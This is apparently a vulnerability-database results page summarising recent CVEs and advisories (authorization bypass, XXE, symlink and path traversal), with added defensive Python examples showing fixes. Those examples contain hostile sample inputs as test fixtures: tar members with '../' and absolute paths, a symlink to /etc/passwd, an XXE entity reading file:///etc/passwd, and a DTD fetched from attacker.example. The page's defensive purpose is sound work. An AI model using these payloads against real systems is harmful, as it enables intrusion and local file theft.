Vulnerability search results: 13577 matches found
CVE (added 2026/05/05 8:35 p.m., 46 views)

CVE-2026-41950

CVE-2026-41950 affects Dify before version 1.14.0. An authorization bypass in the chat-messages flow allows an authenticated user to read the full contents of files uploaded by other users within the same tenant by supplying an arbitrary file UUID in the files array of a chat-messages request. The ro...

CVSS 6.5 | AI score 5.9 | EPSS 0.00334 | Exploits 1 | References 4 | Affected software 1
Snyk (added 2026/05/05 7:32 p.m., 8 views)

XML External Entity (XXE) Injection in org.opencms:opencms-core

Overview: org.opencms:opencms-core is a Java open source content management system by Alkacon Software. Affected versions of this package are vulnerable to XML External Entity (XXE) Injection via insecure XML parsing of user-supplied .zip files containing manifest.xml in the Admin Import DB. An attacker...

CVSS 9.8 | AI score 5.9 | EPSS 0.003 | Exploits 0 | References 2
Vulnrichment (added 2026/05/05 6:55 p.m., 5 views)

CVE-2026-31893 Tunnelblick arbitrary file read via symlink following in tunnelblickd

Tunnelblick is an open source graphic user interface for OpenVPN on macOS. In versions 3.3beta26 through 9.0beta01, any local user can read arbitrary root-owned files by exploiting a symlink following vulnerability in tunnelblick-helper, reachable through the world-accessible tunnelblickd Unix...

CVSS 6.8 | AI score 5.9 | EPSS 0.00242 | Exploits 1 | References 2
EUVD (added 2026/05/05 6:55 p.m., 5 views)

EUVD-2026-27434

Tunnelblick is an open source graphic user interface for OpenVPN on macOS. In versions 3.3beta26 through 9.0beta01, any local user can read arbitrary root-owned files by exploiting a symlink following vulnerability in tunnelblick-helper, reachable through the world-accessible tunnelblickd Unix...

CVSS 6.8 | AI score 5.9 | EPSS 0.00242 | Exploits 1 | References 2
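The two Tunnelblick entries above describe the general shape of a symlink-following bug: a root-privileged helper opens a path supplied by an unprivileged local user, so a symlink planted by that user turns the helper into a file-read oracle for root-owned files. The Python below is an added example, not Tunnelblick's code or its fix, of what such a helper should do instead: open the path one component at a time with O_NOFOLLOW (so a symlinked directory on the way is refused, not only a symlinked final component), fstat the descriptor it actually holds, and return contents only for regular files the caller already owns. The fixtures in `demo()` (a secret file, a file symlink and a directory symlink under a temporary directory) are constructed here; `read_on_behalf_of` and `AccessDenied` are hypothetical names.

```python
import os
import stat
import tempfile


class AccessDenied(PermissionError):
    """Raised when the helper refuses a caller-supplied path (hypothetical name)."""


def open_without_following(path: str) -> int:
    """Open an absolute path component by component with O_NOFOLLOW, so a
    symlink anywhere in the path is refused, not just in the last component.
    Returns an open file descriptor that the caller must close."""
    if not os.path.isabs(path):
        raise AccessDenied("absolute path required")
    # normpath resolves '.' and '..' lexically; that is safe here because every
    # component is then opened without following symlinks.
    parts = [p for p in os.path.normpath(path).split(os.sep) if p]
    fd = os.open("/", os.O_RDONLY | os.O_DIRECTORY)
    try:
        for i, comp in enumerate(parts):
            flags = os.O_RDONLY | os.O_NOFOLLOW
            if i < len(parts) - 1:
                flags |= os.O_DIRECTORY  # intermediate components must be real directories
            try:
                # openat(2) relative to the previous component, never re-walking the string path
                nfd = os.open(comp, flags, dir_fd=fd)
            except OSError as e:
                # ELOOP on Linux when a symlink is hit; any other failure is refused too
                raise AccessDenied(f"refusing {path!r} at {comp!r}: {e.strerror}") from None
            os.close(fd)
            fd = nfd
        return fd
    except BaseException:
        os.close(fd)
        raise


def read_on_behalf_of(path: str, caller_uid: int, limit: int = 1 << 20) -> bytes:
    """What a root helper must check before handing file contents to an
    unprivileged caller: no symlink following, regular files only, and the
    caller must already own the file, so root's privileges add nothing."""
    fd = open_without_following(path)
    try:
        st = os.fstat(fd)  # stat the descriptor we hold, not the path (no TOCTOU window)
        if not stat.S_ISREG(st.st_mode):
            raise AccessDenied("not a regular file")
        if st.st_uid != caller_uid:
            raise AccessDenied("caller does not own this file")
        chunks, remaining = [], limit
        while remaining > 0:
            chunk = os.read(fd, min(remaining, 65536))
            if not chunk:
                break
            chunks.append(chunk)
            remaining -= len(chunk)
        return b"".join(chunks)
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed fixtures: a regular file owned by the current user, a symlink
    to it, and a symlinked directory on the way to it. Reports which reads pass."""
    me = os.getuid()
    with tempfile.TemporaryDirectory() as tmp:
        tmp = os.path.realpath(tmp)  # on macOS /var is itself a symlink to /private/var
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "wb") as f:
            f.write(b"owned by the caller, so readable\n")
        os.symlink(secret, os.path.join(tmp, "link"))
        os.symlink(tmp, os.path.join(tmp, "dlink"))

        def attempt(p: str, uid: int) -> bool:
            try:
                read_on_behalf_of(p, uid)
                return True
            except AccessDenied:
                return False

        return {
            "own_file": attempt(secret, me),
            "file_symlink": attempt(os.path.join(tmp, "link"), me),
            "dir_symlink": attempt(os.path.join(tmp, "dlink", "secret.txt"), me),
            "other_uid": attempt(secret, me + 1),
        }
```

The ownership test is the part that matters most: even with symlinks refused, a helper that reads any regular file root can open is still a privilege escalation if the requesting user could not open it themselves.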
Positive Technologies (added 2026/05/05 12:00 a.m., 9 views)

PT-2026-37239

Vulnerable software and affected versions: Dify versions prior to 1.14.0. Description: An authorization bypass allows authenticated users to read the full contents of files uploaded by other users within the same tenant. This occurs due to insufficient permission verification in the...

CVSS 6.5 | AI score 5.9 | EPSS 0.00334 | Exploits 1 | References 11
CNNVD (added 2026/05/05 12:00 a.m., 7 views)

Nix security vulnerability

Nix is a package manager developed by the Nix project. Versions of Nix prior to 2.34.7 contain a security vulnerability. It stems from a directory traversal in the nix-prefetch-url --unpack and nix store prefetch-file --unpack commands, which allows access to and writing...

CVSS 5.3 | AI score 5.9 | EPSS 0.00573 | Exploits 0 | References 1
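The Nix entry above is the usual --unpack traversal: an archive member whose name or link target climbs out of the destination directory gets written outside it. The Python below is an added example, not Nix's code or its fix, of the checks an unpacker needs before writing any member: absolute names, names that normalise to a parent of the root, link targets that escape, special files, and (the bypass that defeats name-only checks) members whose path passes through an earlier symlink member. The tarball it unpacks is constructed inline; `classify`, `safe_extract` and `demo_extract` are hypothetical names.

```python
import io
import os
import tarfile
import tempfile


def _escapes(relpath: str) -> bool:
    """True if relpath is absolute or climbs above the extraction root."""
    if os.path.isabs(relpath):
        return True
    norm = os.path.normpath(relpath)
    return norm == os.pardir or norm.startswith(os.pardir + os.sep)


def classify(tar: tarfile.TarFile):
    """Split members into those safe to extract and a name -> reason map of rejects."""
    safe, rejected, symlink_members = [], {}, []
    for m in tar.getmembers():
        name = m.name
        parts = name.split("/")
        if _escapes(name):
            rejected[name] = "path escapes extraction root"
        elif any("/".join(parts[:i]) in symlink_members for i in range(1, len(parts))):
            # Writing through a symlink extracted earlier lands wherever it points.
            rejected[name] = "path passes through a symlink member"
        elif m.issym() or m.islnk():
            # Hard-link targets are archive-relative; symlink targets are relative
            # to the link's own directory.
            target = m.linkname if m.islnk() else os.path.join(os.path.dirname(name), m.linkname)
            if _escapes(target):
                rejected[name] = "link target escapes extraction root"
            else:
                safe.append(m)
        elif not (m.isfile() or m.isdir()):
            rejected[name] = "special file (device, fifo)"
        else:
            safe.append(m)
        if m.issym():
            symlink_members.append(name)  # remembered even if rejected
    return safe, rejected


def safe_extract(tar_bytes: bytes, dest: str):
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tf:
        safe, rejected = classify(tf)
        # Belt and braces: also use the stdlib "data" filter where this Python has it.
        extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        for m in safe:
            tf.extract(m, path=dest, **extra)
    return [m.name for m in safe], rejected


def build_sample_archive() -> bytes:
    """Constructed tarball: one honest file and a symlink next to it, plus the
    traversal variants an attacker would ship."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        def add_file(name: str, data: bytes) -> None:
            ti = tarfile.TarInfo(name)
            ti.size = len(data)
            tf.addfile(ti, io.BytesIO(data))

        def add_symlink(name: str, target: str) -> None:
            ti = tarfile.TarInfo(name)
            ti.type = tarfile.SYMTYPE
            ti.linkname = target
            tf.addfile(ti)

        add_file("pkg/ok.txt", b"hello\n")
        add_symlink("pkg/inner", "ok.txt")                 # stays inside: allowed
        add_file("../../evil.txt", b"outside\n")           # classic dot-dot name
        add_file("/etc/evil", b"outside\n")                # absolute name
        add_symlink("pkg/link", "../../../etc/passwd")     # link target escapes
        add_symlink("pkg/d", "../..")                      # symlinked dir pointing out...
        add_file("pkg/d/evil.txt", b"through symlink\n")   # ...then a write through it
    return buf.getvalue()


def demo_extract() -> dict:
    with tempfile.TemporaryDirectory() as dest:
        extracted, rejected = safe_extract(build_sample_archive(), dest)
        ok_on_disk = os.path.isfile(os.path.join(dest, "pkg", "ok.txt"))
    return {"extracted": extracted, "rejected": rejected, "ok_on_disk": ok_on_disk}
```

The pass-through check is why the symlink list is kept even for rejected links: `pkg/d` is refused, but without the list `pkg/d/evil.txt` looks like an ordinary relative path and would be written two levels above the destination on any unpacker that extracts links before files.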
RedhatCVE (added 2026/05/04 8:21 p.m., 6 views)

CVE-2026-5337

During the analysis, it was identified that authenticated attackers with Subscriber-level access or higher are able to perform an Insecure Direct Object Reference (IDOR) attack. This vulnerability exists because the Frontend File Manager Plugin WordPress plugin through 23.6 does not properly valida...

CVSS 6.5 | AI score 5.8 | EPSS 0.00212 | Exploits 0 | References 1
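The Dify entries (CVE-2026-41950, PT-2026-37239) and the Frontend File Manager entry above are the same bug class: a file identifier in the request is treated as proof of access, so any authenticated user who obtains someone else's identifier can read their upload. The Python below is an added example, not code from Dify or the WordPress plugin, that puts the vulnerable lookup next to the corrected one: the fix binds the lookup to the requesting principal, not just to tenant membership, and returns the same error for "missing" and "not yours" so the endpoint is not a UUID-existence oracle. The store, record fields and names (`FileStore`, `resolve_files_vulnerable`, `resolve_files_fixed`) are hypothetical.

```python
import uuid
from dataclasses import dataclass


@dataclass(frozen=True)
class UploadedFile:
    # Hypothetical record shape; not taken from Dify or the plugin.
    file_id: str
    tenant_id: str
    created_by: str
    name: str
    content: bytes


class Forbidden(PermissionError):
    pass


class FileStore:
    """In-memory upload store keyed by the random UUID that clients later send back."""

    def __init__(self) -> None:
        self._files = {}

    def upload(self, tenant_id: str, user_id: str, name: str, content: bytes) -> str:
        fid = str(uuid.uuid4())
        self._files[fid] = UploadedFile(fid, tenant_id, user_id, name, content)
        return fid

    def get_any(self, file_id: str):
        return self._files.get(file_id)


def resolve_files_vulnerable(store: FileStore, tenant_id: str, file_ids):
    """The IDOR: existence plus same-tenant is all that is checked, so any
    tenant member who learns a UUID (logs, shared URLs, a guess) reads the file."""
    out = []
    for fid in file_ids:
        f = store.get_any(fid)
        if f is None or f.tenant_id != tenant_id:
            raise Forbidden("file not found")
        out.append(f)
    return out


def resolve_files_fixed(store: FileStore, tenant_id: str, user_id: str, file_ids):
    """Authorise each id against the requesting user. One error message for
    every failure mode, so the response does not reveal whether the id exists."""
    out = []
    for fid in file_ids:
        f = store.get_any(fid)
        if f is None or f.tenant_id != tenant_id or f.created_by != user_id:
            raise Forbidden("file not found")
        out.append(f)
    return out


def demo() -> dict:
    """Alice and Bob share a tenant; Bob replays Alice's file UUID in his own request."""
    store = FileStore()
    alice_file = store.upload("tenant-1", "alice", "payroll.csv", b"name,salary\n")

    try:
        leaked = resolve_files_vulnerable(store, "tenant-1", [alice_file])[0].content.startswith(b"name")
    except Forbidden:
        leaked = False
    try:
        resolve_files_fixed(store, "tenant-1", "bob", [alice_file])
        blocked = False
    except Forbidden:
        blocked = True
    owner_ok = resolve_files_fixed(store, "tenant-1", "alice", [alice_file])[0].name == "payroll.csv"
    try:
        resolve_files_fixed(store, "tenant-2", "alice", [alice_file])
        cross_tenant_blocked = False
    except Forbidden:
        cross_tenant_blocked = True
    return {
        "leaked_via_vulnerable": leaked,
        "blocked_by_fixed": blocked,
        "owner_still_works": owner_ok,
        "cross_tenant_blocked": cross_tenant_blocked,
    }
```

If sharing between users is a feature, replace the `created_by` test with a lookup of an explicit grant for `user_id`; what must never stand in for it is tenant membership alone, which is exactly the check the vulnerable version relies on.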
Snyk (added 2026/05/04 6:27 p.m., 7 views)

XML External Entity (XXE) Injection

Overview: Affected versions of this package are vulnerable to XML External Entity (XXE) Injection via the create method in the DictionaryEntryPersistor class, which initializes a SAXParserFactory without enabling FEATURE_SECURE_PROCESSING or disabling DTD processing. An attacker can access local files...

CVSS 9.1 | AI score 5.9 | EPSS 0.00403 | Exploits 0 | References 2
OSV (added 2026/05/04 1:16 p.m., 2 views)

DEBIAN-CVE-2026-24072

An escalation of privilege bug in various modules in Apache HTTP Server 2.4.66 and earlier allows local .htaccess authors to read files with the privileges of the httpd user. Users are recommended to upgrade to version 2.4.67, which fixes this issue...

CVSS 8.8 | AI score 5.8 | EPSS 0.00654 | Exploits 1 | References 1
Tenable Nessus (added 2026/05/04 12:00 a.m., 14 views)

Apache 2.4.x < 2.4.67 Multiple Vulnerabilities

The version of Apache httpd installed on the remote host is prior to 2.4.67. It is, therefore, affected by multiple vulnerabilities as referenced in the 2.4.67 advisory. - Heap-based Buffer Overflow vulnerability in mod_proxy_ajp of Apache HTTP Server. If mod_proxy_ajp connects to a malicious AJP...

CVSS 9.8 | AI score 6 | EPSS 0.42802 | Exploits 18 | References 11
AstraLinux (added 2026/05/03 11:59 p.m., 3 views)

Astra Linux – Vulnerability in Chromium

Inappropriate implementation in Downloads in Google Chrome prior to 114.0.5735.90 allowed an attacker who convinced a user to install a malicious extension to bypass file access restrictions via a crafted HTML page. Chromium security severity: Medium...

CVSS 6.5 | AI score 6.8 | EPSS 0.00693 | Exploits 0 | References 2
AstraLinux (added 2026/05/03 11:59 p.m., 4 views)

Astra Linux – Vulnerability in Containerd

Containerd is a container runtime that is available as a daemon for Linux and Windows. A bug was discovered in Containerd prior to versions 1.6.1, 1.5.10, and 1.4.12. In these versions, containers launched through Containerd's CRI implementation on Linux, with a specially crafted image...

CVSS 7.5 | AI score 6.7 | EPSS 0.27392 | Exploits 4 | References 2
Snyk (added 2026/05/02 6:30 p.m., 7 views)

Directory Traversal

Overview: sublinear-time-solver describes itself as "The Ultimate Mathematical & AI Toolkit: Sublinear algorithms, consciousness exploration, psycho-symbolic reasoning, chaos analysis, and temporal prediction in one unified MCP interface. WASM-accelerated with Lyapunov exponents and attractor dynamics." Affected...

CVSS 6.9 | AI score 7 | EPSS 0.00462 | Exploits 0 | References 2
ATTACKERKB (added 2026/04/30 9:29 p.m., 2 views)

CVE-2026-7551

HKUDS OpenHarness contains a remote code execution vulnerability in the /bridge slash command that allows remote senders accepted by configuration to execute arbitrary operating system commands. Attackers can invoke the /bridge spawn command with attacker-controlled command text that is forwarded...

CVSS 8.8 | AI score 6.7 | EPSS 0.00649 | Exploits 1 | References 4
OSV (added 2026/04/30 5:25 p.m., 8 views)

GHSA-RCH3-82JR-F9W9 Jupyter Notebook Vulnerable to Authentication Token Theft via CommandLinker XSS

Impact: A stored Cross-Site Scripting (XSS) vulnerability in Jupyter Notebook allows attackers to steal authentication tokens from users who open malicious notebook files and interact with elements that the attacker can make look indistinguishable from legitimate controls (single-click interaction). T...

CVSS 8.4 | AI score 6 | EPSS 0.00476 | Exploits 0 | References 4
NVD (added 2026/04/30 12:16 p.m., 6 views)

CVE-2026-41882

In JetBrains IntelliJ IDEA before 2024.3.7.1, 2025.1.7.1, 2025.2.6.2, 2025.3.4.1, 2026.1.1 reading arbitrary local files was possible via built-in web server...

CVSS 7.5 | EPSS 0.00401 | Exploits 0 | References 1
EUVD (added 2026/04/30 11:05 a.m., 4 views)

EUVD-2026-26368

In JetBrains IntelliJ IDEA before 2024.3.7.1, 2025.1.7.1, 2025.2.6.2, 2025.3.4.1, 2026.1.1 reading arbitrary local files was possible via built-in web server...

CVSS 7.4 | AI score 5.3 | EPSS 0.00401 | Exploits 0 | References 1
Nuclei (added 2026/04/30 5:10 a.m., 5 views)

Wangshen SecGate 3600 Path Traversal Vulnerability

Wangshen SecGate 3600 2400 contains a path traversal caused by manipulation of the 'filename' argument in '?g=logexportfile', letting remote attackers access arbitrary files; the exploit requires remote access. Template header: id: CVE-2025-4078, info: name: Wangshen SecGate 3600 Path Traversal Vulnerability, author: A...

CVSS 5.3 | AI score 4.9 | EPSS 0.00928 | Exploits 0 | References 2
SUSE CVE (added 2026/04/30 2:25 a.m., 4 views)

SUSE CVE-2026-41066

lxml is a library for processing XML and HTML in the Python language. Prior to 6.1.0, using either of the two parsers in the default configuration with resolve_entities=True allows untrusted XML input to read local files. Setting the resolve_entities option explicitly to resolve_entities='internal' ...

CVSS 5.9 | AI score 5.3 | EPSS 0.00324 | Exploits 1 | References 8
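Three entries on this page are the same XXE root cause seen from three parsers: OpenCms parsing an attacker-supplied manifest.xml, a Java class initialising a SAXParserFactory without FEATURE_SECURE_PROCESSING or DTD processing disabled, and lxml resolving entities by default. Whatever the parser, the fix is the same policy: untrusted XML gets no DOCTYPE, no entity declarations and no external references, so nothing can point the parser at file:/// or an attacker's DTD. The Python below is an added example, not code from any of those projects, that enforces that policy as a throwaway expat pre-pass before the real parse; it mirrors what defusedxml does and is parser-independent, so the same gate can sit in front of lxml or a SAX parser. The sample documents are constructed here; `reject_dtd_and_entities`, `parse_untrusted` and `is_safe` are hypothetical names. Note that Python's own expat never fetches external entities by itself, which is why the file-read payload is a real problem in lxml and default Java SAX but only a refused-DOCTYPE here.

```python
import xml.parsers.expat
from xml.etree import ElementTree as ET


class UnsafeXml(ValueError):
    """Untrusted XML carried a DOCTYPE, an entity declaration or an external reference."""


def reject_dtd_and_entities(data: bytes) -> None:
    """Throwaway expat pass whose only job is to abort on DTD constructs.
    Raising inside an expat handler stops the parse and the exception propagates,
    so no entity, internal or external, is ever expanded or fetched."""
    p = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE {name!r} not allowed in untrusted input")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXml(f"entity declaration {name!r} not allowed")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXml(f"external entity reference to {sysid!r} not allowed")

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity_decl
    p.ExternalEntityRefHandler = on_external_ref
    p.Parse(data, True)


def parse_untrusted(data: bytes) -> ET.Element:
    """Gate first, then hand the document to the parser the application actually uses."""
    reject_dtd_and_entities(data)
    return ET.fromstring(data)


def is_safe(data: bytes) -> bool:
    try:
        reject_dtd_and_entities(data)
        return True
    except UnsafeXml:
        return False


# Constructed samples: the kind of manifest an import feature expects, and three
# hostile variants (local file read, remote DTD fetch, entity expansion).
BENIGN = b'<manifest><file path="index.html"/></manifest>'
XXE_FILE_READ = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE manifest [\n'
    b'  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
    b']>\n'
    b'<manifest><file>&xxe;</file></manifest>'
)
REMOTE_DTD = b'<!DOCTYPE manifest SYSTEM "http://attacker.example/evil.dtd"><manifest/>'
ENTITY_EXPANSION = (
    b'<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;">]>'
    b'<lolz>&lol2;</lolz>'
)
```

In lxml the equivalent per-parser setting is `etree.XMLParser(resolve_entities=False)` (the option named in the SUSE entry); in Java, set `XMLConstants.FEATURE_SECURE_PROCESSING` on the factory and, where the parser supports it, the Xerces feature `http://apache.org/xml/features/disallow-doctype-decl`. The pre-pass above is still worth keeping in front of either, because it fails closed regardless of which parser a later refactor swaps in.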
CNNVD (added 2026/04/30 12:00 a.m., 7 views)

OPPO ColorOS Assistant path traversal vulnerability

OPPO ColorOS Assistant is an intelligent voice assistant application developed by OPPO Corporation in China. OPPO ColorOS Assistant has a path traversal vulnerability, which stems from an unvalidated startup download channel, potentially leading to file path traversal...

CVSS 9.8 | AI score 5.8 | EPSS 0.00208 | Exploits 0 | References 1